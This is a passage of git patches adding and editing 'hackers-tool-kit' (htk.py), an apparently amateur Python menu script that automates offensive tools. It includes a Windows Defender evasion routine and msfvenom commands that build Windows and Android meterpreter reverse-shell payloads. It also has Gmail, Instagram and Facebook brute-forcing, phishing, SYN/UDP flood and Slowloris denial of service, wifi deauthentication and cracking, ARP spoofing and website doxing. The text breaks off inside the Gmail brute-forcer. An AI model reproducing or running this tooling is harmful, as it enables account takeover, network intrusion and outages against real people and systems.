Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - -#ABOUT ME / THE CREATOR START# -#----------------------------# -def about(): - print "\033[92m------------------------------------------------------------" - print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" - print "------------------------------------------------------------" - print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" - print "------------------------------------------------------------" - print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" - print "------------------------------------------------------------" - print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" - print "------------------------------------------------------------\033[0m" -#--------------------------# -#ABOUT ME / THE CREATOR END# - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#CLEAR ALL START# -#---------------# -def clearall(): - os.system("clear") -#-------------# -#CLEAR ALL END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#REFRESH BANNER START# -#--------------------# -def banner(): - os.system("clear") - mainbanner() -#------------------# -#REFRESH BANNER END# - - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mh-\033[94mT\033[0m-k\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "about": - about() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - if x == "banner": - banner() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From a2c53582cde13a572a6745641efd62230afb849a Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Tue, 14 May 2019 17:51:39 +0100 Subject: [PATCH 114/214] Add files via upload --- htk.py | 2711 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2711 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..3bfd922 --- /dev/null +++ b/htk.py @@ -0,0 +1,2711 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,7) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +about : about the creator / me +? : displays this message +clear : clears screen except for banner +clearall: clears everything on screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ 